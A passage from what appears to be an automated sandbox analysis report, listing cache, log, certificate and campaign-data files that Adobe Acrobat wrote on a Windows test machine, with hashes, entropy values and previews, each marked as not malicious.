                                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG

                                                                                        Download File
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                        File Type:ASCII text
                                                                                        Category:dropped
                                                                                        Size (bytes):342
                                                                                        Entropy (8bit):5.2026918456977365
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:7IQ4+q2PN72nKuAl9Ombzo2jMGIFUt8OIhWZmw+OIB4SNVkwON72nKuAl9Ombzos:7l4+vVaHAa8uFUt8On/+Oo4SNV5OaHAv
                                                                                        MD5:FA1D19C1D63D653CE62D4B870F5DA20F
                                                                                        SHA1:E844A964823E4ECA7D85820DB9C6E6A8BEC41270
                                                                                        SHA-256:0D0EF1A76DE99D10AFEC282D62E4D96202963E311A156812798AA86CE8FA36FB
                                                                                        SHA-512:FE2A20257A646CF4464A515DE18551EBD70F249BC536A80ACFAEE2FB0BAC7D038527417FEE167D23BF9084F326A5219BF0E445977F43C12497019703FFA27D7A
                                                                                        Malicious:false
                                                                                        Preview:2024/12/19-06:52:48.969 120c Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/12/19-06:52:48.971 120c Recovering log #3.2024/12/19-06:52:48.972 120c Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .

                                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)

                                                                                        Download File
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                        File Type:ASCII text
                                                                                        Category:dropped
                                                                                        Size (bytes):342
                                                                                        Entropy (8bit):5.2026918456977365
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:7IQ4+q2PN72nKuAl9Ombzo2jMGIFUt8OIhWZmw+OIB4SNVkwON72nKuAl9Ombzos:7l4+vVaHAa8uFUt8On/+Oo4SNV5OaHAv
                                                                                        MD5:FA1D19C1D63D653CE62D4B870F5DA20F
                                                                                        SHA1:E844A964823E4ECA7D85820DB9C6E6A8BEC41270
                                                                                        SHA-256:0D0EF1A76DE99D10AFEC282D62E4D96202963E311A156812798AA86CE8FA36FB
                                                                                        SHA-512:FE2A20257A646CF4464A515DE18551EBD70F249BC536A80ACFAEE2FB0BAC7D038527417FEE167D23BF9084F326A5219BF0E445977F43C12497019703FFA27D7A
                                                                                        Malicious:false
                                                                                        Preview:2024/12/19-06:52:48.969 120c Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/12/19-06:52:48.971 120c Recovering log #3.2024/12/19-06:52:48.972 120c Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .

                                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\3be88ec0-e5fe-4a6a-b7b1-076e45ecf3b8.tmp

                                                                                        Download File
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):475
                                                                                        Entropy (8bit):4.971824627296864
                                                                                        Encrypted:false
                                                                                        SSDEEP:12:YH/um3RA8sq1ZhsBdOg2HIJnAcaq3QYiubcP7E4TX:Y2sRdswydMH0r3QYhbA7n7
                                                                                        MD5:F326539D084B03D88254A74D6018F692
                                                                                        SHA1:395B367E0E3554C3E78A8211F2D4B9F0F427CA87
                                                                                        SHA-256:9379694CADD7846403E1B6975502326FBC619E0E3A873BBB7BC2C03EE3623007
                                                                                        SHA-512:C8B5B1DD28605D3FCD9EF4A28BE1125137E6B3CB967F59CB2113656C8EFFFB3842115962DF8B25E9C3FA504F5E1B0A116D780326B1AB8062DC6AC0D80E7C3539
                                                                                        Malicious:false
                                                                                        Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341048370594526","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":151499},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.6","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}

                                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)

                                                                                        Download File
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):475
                                                                                        Entropy (8bit):4.971824627296864
                                                                                        Encrypted:false
                                                                                        SSDEEP:12:YH/um3RA8sq1ZhsBdOg2HIJnAcaq3QYiubcP7E4TX:Y2sRdswydMH0r3QYhbA7n7
                                                                                        MD5:F326539D084B03D88254A74D6018F692
                                                                                        SHA1:395B367E0E3554C3E78A8211F2D4B9F0F427CA87
                                                                                        SHA-256:9379694CADD7846403E1B6975502326FBC619E0E3A873BBB7BC2C03EE3623007
                                                                                        SHA-512:C8B5B1DD28605D3FCD9EF4A28BE1125137E6B3CB967F59CB2113656C8EFFFB3842115962DF8B25E9C3FA504F5E1B0A116D780326B1AB8062DC6AC0D80E7C3539
                                                                                        Malicious:false
                                                                                        Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341048370594526","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":151499},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.6","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}

                                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State~RF54b50f.TMP (copy)

                                                                                        Download File
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):475
                                                                                        Entropy (8bit):4.971824627296864
                                                                                        Encrypted:false
                                                                                        SSDEEP:12:YH/um3RA8sq1ZhsBdOg2HIJnAcaq3QYiubcP7E4TX:Y2sRdswydMH0r3QYhbA7n7
                                                                                        MD5:F326539D084B03D88254A74D6018F692
                                                                                        SHA1:395B367E0E3554C3E78A8211F2D4B9F0F427CA87
                                                                                        SHA-256:9379694CADD7846403E1B6975502326FBC619E0E3A873BBB7BC2C03EE3623007
                                                                                        SHA-512:C8B5B1DD28605D3FCD9EF4A28BE1125137E6B3CB967F59CB2113656C8EFFFB3842115962DF8B25E9C3FA504F5E1B0A116D780326B1AB8062DC6AC0D80E7C3539
                                                                                        Malicious:false
                                                                                        Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341048370594526","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":151499},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.6","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}

                                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\f02d09dd-d233-4fcd-85a3-48d38dda70ce.tmp

                                                                                        Download File
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                        File Type:JSON data
                                                                                        Category:modified
                                                                                        Size (bytes):475
                                                                                        Entropy (8bit):4.9710571999777065
                                                                                        Encrypted:false
                                                                                        SSDEEP:12:YH/um3RA8sq3sBdOg2H/dtcaq3QYiubcP7E4TX:Y2sRdsldMH/C3QYhbA7n7
                                                                                        MD5:2A01ED60D54DF06386E1179243B0D7BA
                                                                                        SHA1:05F6E3CF5C4D4E804ADA43A1A68AF3BC8D833F4C
                                                                                        SHA-256:1211D0F1CF7E76A9A1BD0182AEE232CBDA01E2C72BD26350EFFEEADB09EA2D95
                                                                                        SHA-512:B8722734EE5EE99E551168502BDD041759FB219B216EE6EB4F22F594EDB258F7D9DAF561F778B48FF321CA133CC95962FF0170E5AF8A95EE5850FBD8A5ED0C24
                                                                                        Malicious:false
                                                                                        Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13379169180576278","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":641868},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.6","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}

                                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log

                                                                                        Download File
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):5449
                                                                                        Entropy (8bit):5.250148281822142
                                                                                        Encrypted:false
                                                                                        SSDEEP:96:av+Nkkl+2GAouz3z3xfNLUS3vHp5OuDzUrMzh28qXAXFP74LRXOtW7ANwE7YP2Il:av+Nkkl+2G1uz3zhfZUyPp5OuDzUwzhO
                                                                                        MD5:01D66819A3505D0F426D6413E2AAFC17
                                                                                        SHA1:AD6644C9C821EC6B67DE15F4FB1B85BDFF4A69D1
                                                                                        SHA-256:458CBB90C77C463FDDBDB6341FAAE8B25A8783E04B31EDF9CA2860B2027B2856
                                                                                        SHA-512:D3290064C6CD849B9156AA9A62ED5229C9C1B710D578E177014DBB5CB6945A9CC9EE8861EB92DA6417D2508DF85D732028B9B4A1624528DEB2BE00965931A22F
                                                                                        Malicious:false
                                                                                        Preview:*...#................version.1..namespace-.X.Bo................next-map-id.1.Pnamespace-c291b69d_46f8_4b09_b54e_d05df8a1271d-https://rna-resource.acrobat.com/.0.>j.r................next-map-id.2.Snamespace-63b958a8_6f71_4fde_913c_6518794b9fd1-https://rna-v2-resource.acrobat.com/.1.J.4r................next-map-id.3.Snamespace-37e4c694_2a8d_4b31_9eb8_e65c5f9e16d5-https://rna-v2-resource.acrobat.com/.2..J.o................next-map-id.4.Pnamespace-d7426d52_3038_4cd9_b9cc_897232425509-https://rna-resource.acrobat.com/.3..M.^...............Pnamespace-c291b69d_46f8_4b09_b54e_d05df8a1271d-https://rna-resource.acrobat.com/..d.^...............Pnamespace-d7426d52_3038_4cd9_b9cc_897232425509-https://rna-resource.acrobat.com/.u..a...............Snamespace-63b958a8_6f71_4fde_913c_6518794b9fd1-https://rna-v2-resource.acrobat.com/..`aa...............Snamespace-37e4c694_2a8d_4b31_9eb8_e65c5f9e16d5-https://rna-v2-resource.acrobat.com/`v.Yo................next-map-id.5.Pnamespace-30587558_ed88_4bd8_adc0_

                                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG

                                                                                        Download File
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                        File Type:ASCII text
                                                                                        Category:dropped
                                                                                        Size (bytes):330
                                                                                        Entropy (8bit):5.156058139965514
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:7INxN+q2PN72nKuAl9OmbzNMxIFUt8OIqWWZmw+OIPuUNVkwON72nKuAl9OmbzNq:7m+vVaHAa8jFUt8Ov/+OyrV5OaHAa84J
                                                                                        MD5:C32D972E51F793AE7B7B6CC3C61121FF
                                                                                        SHA1:7CA10AEBDF8D3E28CE5EF64612DB608BDAE211FE
                                                                                        SHA-256:B71965F73B5349257392A505F301093245E5BF018B12B1F86A49BB301C0A134C
                                                                                        SHA-512:A99979D31C7A1FABA7928522B5A5B5F589F0C7C83A05E1EB8F8A1444DF533250FCD091A6FEAD4EB19C1B99923FD5AA019B0A82C580360A8A3DA4CBF2B1A295F5
                                                                                        Malicious:false
                                                                                        Preview:2024/12/19-06:52:49.025 120c Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/12/19-06:52:49.026 120c Recovering log #3.2024/12/19-06:52:49.027 120c Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .

                                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)

                                                                                        Download File
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                        File Type:ASCII text
                                                                                        Category:dropped
                                                                                        Size (bytes):330
                                                                                        Entropy (8bit):5.156058139965514
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:7INxN+q2PN72nKuAl9OmbzNMxIFUt8OIqWWZmw+OIPuUNVkwON72nKuAl9OmbzNq:7m+vVaHAa8jFUt8Ov/+OyrV5OaHAa84J
                                                                                        MD5:C32D972E51F793AE7B7B6CC3C61121FF
                                                                                        SHA1:7CA10AEBDF8D3E28CE5EF64612DB608BDAE211FE
                                                                                        SHA-256:B71965F73B5349257392A505F301093245E5BF018B12B1F86A49BB301C0A134C
                                                                                        SHA-512:A99979D31C7A1FABA7928522B5A5B5F589F0C7C83A05E1EB8F8A1444DF533250FCD091A6FEAD4EB19C1B99923FD5AA019B0A82C580360A8A3DA4CBF2B1A295F5
                                                                                        Malicious:false
                                                                                        Preview:2024/12/19-06:52:49.025 120c Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/12/19-06:52:49.026 120c Recovering log #3.2024/12/19-06:52:49.027 120c Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .

                                                                                        C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ConnectorIcons\icon-241219115254Z-211.bmp

                                                                                        Download File
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:PC bitmap, Windows 3.x format, 107 x -152 x 32, cbSize 65110, bits offset 54
                                                                                        Category:dropped
                                                                                        Size (bytes):65110
                                                                                        Entropy (8bit):0.6376462682686903
                                                                                        Encrypted:false
                                                                                        SSDEEP:96:Fn1AGmY2nTLKnzN4lu1/4uy47rHMMMxAz:FsY2XQzyQnuc
                                                                                        MD5:1468EB269F45D6EECE72317AF6B1587F
                                                                                        SHA1:AB52469CD54F341F71D8EEA78E5293C597CC2560
                                                                                        SHA-256:56B0D18154217AEBE5F78DAA5DAF7861967BB4B615B7D1FFCDBC3C98C8834393
                                                                                        SHA-512:FFEF2EC31529E6165D9549A150FC8DA65917002B81A8E4747853AC7F51D88B3AC545862D5EB39684064EE600140C9D0BDAA97D14067C01AA24B17419950781FA
                                                                                        Malicious:false
                                                                                        Preview:BMV.......6...(...k...h..... ...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

                                                                                        Download File
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 11, database pages 21, cookie 0x5, schema 4, UTF-8, version-valid-for 11
                                                                                        Category:dropped
                                                                                        Size (bytes):86016
                                                                                        Entropy (8bit):4.444731358701793
                                                                                        Encrypted:false
                                                                                        SSDEEP:384:ye6ci5tRiBA7aDQPsknQ0UNCFOa14ocOUw6zyFzqFkdZ+EUTTcdUZ5yDQhJL:mis3OazzU89UTTgUL
                                                                                        MD5:D0C70E2A7380FC74D89B45EEC5F3740F
                                                                                        SHA1:D56F107FD7D87D4B1F3D081B0B79FD7BB538476C
                                                                                        SHA-256:B528A9BC9E21ABEFAF99FC37B88025A4AA7A589F5C9D3473438596FF3D7311ED
                                                                                        SHA-512:95F1C921D88CA5A00057E88D98089A77E742F8B58E41C4C04C443C6279C551C79D378C65CBE6426C0112942D5C7A8D6750B1763BF8C0801161E1D67BDFE734DC
                                                                                        Malicious:false
                                                                                        Preview:SQLite format 3......@ ..........................................................................c.......1........T...U.1.D............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages-journal

                                                                                        Download File
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:SQLite Rollback Journal
                                                                                        Category:dropped
                                                                                        Size (bytes):8720
                                                                                        Entropy (8bit):3.763969027574141
                                                                                        Encrypted:false
                                                                                        SSDEEP:48:7M0JioyVaioysoy1C7oy16oy1UKOioy1noy1AYoy1Wioy1oioykioyBoy1noy1Os:7DJuaovXjBifb9IVXEBodRBkD
                                                                                        MD5:5698B73A9EFFD03BDE8A072C3E61F6AC
                                                                                        SHA1:84CF503D7BEC5BAD94E85E61F9C6D022E5774F0B
                                                                                        SHA-256:F9743A24BCCE0C28C2E91D4EE4CF8911EA40C6C36A87CAE4081882D3A5F5A4EF
                                                                                        SHA-512:9E7478683F32423EF889BF4A5BE7B6411094800E88FB6FF2B003BBEA798A8308FA3FE988CDF6C06E87D4479BA5A6A7A4BB144B856CC1B2914303DA10134B641D
                                                                                        Malicious:false
                                                                                        Preview:.... .c...../.>w...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................T...[...b.r.l...t...}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D

                                                                                        Download File
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                        File Type:Certificate, Version=3
                                                                                        Category:dropped
                                                                                        Size (bytes):1391
                                                                                        Entropy (8bit):7.705940075877404
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1
                                                                                        MD5:0CD2F9E0DA1773E9ED864DA5E370E74E
                                                                                        SHA1:CABD2A79A1076A31F21D253635CB039D4329A5E8
                                                                                        SHA-256:96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
                                                                                        SHA-512:3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
                                                                                        Malicious:false
                                                                                        Preview:0..k0..S............@.YDc.c...0...*.H........0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10...150604110438Z..350604110438Z0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10.."0...*.H.............0..........$s..7.+W(.....8..n<.W.x.u...jn..O(..h.lD...c...k....1.!~.3<.H..y.....!.K...qiJffl.~<p..)"......K...~....G.|.H#S.8.O.o...IW..t../.8.{.p!.u.0<.....c...O..K~.....w...{J.L.%.p..)..S$........J.?..aQ.....cq...o[...\4ylv.;.by.../&.....................6....7..6u...r......I.....*.A..v........5/(.l....dwnG7..Y^h..r...A)>Y>.&.$...Z.L@.F....:Qn.;.}r...xY.>Qx....../..>{J.Ks......P.|C.t..t.....0.[q6....00\H..;..}`...).........A.......|.;F.H*..v.v..j.=...8.d..+..(.....B.".'].y...p..N..:..'Qn..d.3CO......B0@0...U...........0...U.......0....0...U......y.Y.{....s.....X..n0...*.H.............U.X....P.....i ')..au\.n...i/..VK..s.Y.!.~.Lq...`.9....!V..P.Y...Y.............b.E.f..|o..;.....'...}~.."......

                                                                                        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D

                                                                                        Download File
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):192
                                                                                        Entropy (8bit):2.756901573172974
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:kkFkl/nefllXlE/HT8kvFlh/tNNX8RolJuRdxLlGB9lQRYwpDdt:kKkT8mfRNMa8RdWBwRd
                                                                                        MD5:1867D3DADE7A56999F90E54D7A35D9A9
                                                                                        SHA1:412925BCA7F3E413E1A4543343CED0C3A5B25A93
                                                                                        SHA-256:FAC4D9B0FFA1A1E901B7EBC66A8EBDC264D9341ABA67A5AB10B33975AD0B2FC7
                                                                                        SHA-512:4EE0831E60ECB2D1E36034C2D53343A21200195F5F8856EE4EC4ED7D5691569C871E6C46FFCC3F3C06E69F3D27477DB0C240265410E0EC6220B0882C35874ED7
                                                                                        Malicious:false
                                                                                        Preview:p...... ..........D..R..(....................................................... ..........W....................o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".6.4.c.d.6.6.5.4.-.5.6.f."...

                                                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\ACROBAT_READER_MASTER_SURFACEID

                                                                                        Download File
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):295
                                                                                        Entropy (8bit):5.339679110304712
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:YEQXJ2HX46+nZiQ0YIoAvJM3g98kUwPeUkwRe9:YvXKX4/ccGMbLUkee9
                                                                                        MD5:381CB05BE1414EDF08F973274EE27A3E
                                                                                        SHA1:82AF8D519806671C41DEAC3C7928C6FC2549E990
                                                                                        SHA-256:8AD4C663E599A3B7DEA06B5860BA649E17901AD824D9954DE9770CF1C6E829F6
                                                                                        SHA-512:80A16CD4FB1E9447DFA3DA147E5153EE1E561512C8FAD730A405DA6F7C337732259E3C507BC573A8B32A648E49CF6B2451FA8757974BEDF58010BA445111D058
                                                                                        Malicious:false
                                                                                        Preview:{"analyticsData":{"responseGUID":"f0441a81-060b-4f05-ac10-cb14b80ea542","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1734785715359,"statusCode":200,"surfaceID":"ACROBAT_READER_MASTER_SURFACEID","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Home_View_Surface

                                                                                        Download File
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):294
                                                                                        Entropy (8bit):5.292295272548499
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:YEQXJ2HX46+nZiQ0YIoAvJfBoTfXpnrPeUkwRe9:YvXKX4/ccGWTfXcUkee9
                                                                                        MD5:38885190BC1DECC768AF98D8A34A5940
                                                                                        SHA1:837F4ED548424A9C63895FC8061B73E4081A896F
                                                                                        SHA-256:A11097147F1D15B44DF34B21B34211DF5A0090F6EC003B1D43B855BC48C40ADA
                                                                                        SHA-512:B6663A27C71F0EE72DAB8DA1CF0A553A452C28649A1E7C6745BF34D5C0D11D7DEF1F80A322D8E8B714798BB387D308F64944EBF7F81073754FE25F75CE4C1517
                                                                                        Malicious:false
                                                                                        Preview:{"analyticsData":{"responseGUID":"f0441a81-060b-4f05-ac10-cb14b80ea542","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1734785715359,"statusCode":200,"surfaceID":"DC_FirstMile_Home_View_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Right_Sec_Surface

                                                                                        Download File
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):294
                                                                                        Entropy (8bit):5.270554767906305
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:YEQXJ2HX46+nZiQ0YIoAvJfBD2G6UpnrPeUkwRe9:YvXKX4/ccGR22cUkee9
                                                                                        MD5:D0451E121AD2CAFC1EDFCDE0FFDF0190
                                                                                        SHA1:EFFAC4407E43BC9BCC7CC25AFF2120D4B8A9E8DF
                                                                                        SHA-256:5B28BFA608EFCB0B679414048C958D009680B0AD177BAAC9828E9A5DCB5831A8
                                                                                        SHA-512:B79018E116A6375A77CA1E573DBEB0EA6C8112762E676BA5ED1B25B3B9E366F9BD89ABCB1E20FC3613B7D96BAB0DEA7AD3E726D45D96F80807615C5513F3716E
                                                                                        Malicious:false
                                                                                        Preview:{"analyticsData":{"responseGUID":"f0441a81-060b-4f05-ac10-cb14b80ea542","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1734785715359,"statusCode":200,"surfaceID":"DC_FirstMile_Right_Sec_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_READER_LAUNCH_CARD

                                                                                        Download File
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):285
                                                                                        Entropy (8bit):5.31887065874014
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:YEQXJ2HX46+nZiQ0YIoAvJfPmwrPeUkwRe9:YvXKX4/ccGH56Ukee9
                                                                                        MD5:D67A39386C9E3D971B0FB83D2E299EB2
                                                                                        SHA1:42355D66A202ED7255B81AD4CEED4168C665540C
                                                                                        SHA-256:06EA484A7676C62E5B11E6FE2574C9D4F0511218FD8D80691CB6306C1A809DE1
                                                                                        SHA-512:7946C5546090BFAC9B9C4BB449705E223F32612728CDB1B2967DEEB69B969D319CC60F2FC6F129AE4C050EBA5C83305D3CB6C3AF7240E14F88D5D7EBDEAD019C
                                                                                        Malicious:false
                                                                                        Preview:{"analyticsData":{"responseGUID":"f0441a81-060b-4f05-ac10-cb14b80ea542","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1734785715359,"statusCode":200,"surfaceID":"DC_READER_LAUNCH_CARD","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Convert_LHP_Banner

                                                                                        Download File
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):1123
                                                                                        Entropy (8bit):5.690610676137315
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:Yv6X4kZpLgE9cQx8LennAvzBvkn0RCmK8czOCCSf:Yv9Yhgy6SAFv5Ah8cv/f
                                                                                        MD5:2DC0AB607F0B98CE2C1FAF6511509C62
                                                                                        SHA1:7974BFCEC89322EA8C254046A223F7A3C1888150
                                                                                        SHA-256:3E694FD10493A74A775DC405F6DEF5CCB132BBA5458A23787F86EDECF2AF428B
                                                                                        SHA-512:F99306BECE7844DE9792DEDBD201F77B9EE87DB8D40D1A58EB7F2590C5C6E11B3691BF52A67001B2B6639FA3AC554447A2B9A47E84F647EDF6F484C98900846E
                                                                                        Malicious:false
                                                                                        Preview:{"analyticsData":{"responseGUID":"f0441a81-060b-4f05-ac10-cb14b80ea542","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1734785715359,"statusCode":200,"surfaceID":"DC_Reader_Convert_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Convert_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_1","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"d5bba1ae-6009-4d23-8886-fd4a474b8ac9","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Convert_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IkNvbnZlcnRQREZSZHJSSFBBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkV4cG9ydCBQREZzIHRvIE1pY3Jvc29mdCBXb3JkIGFuZCBFeGNlbC4ifSwidGNh

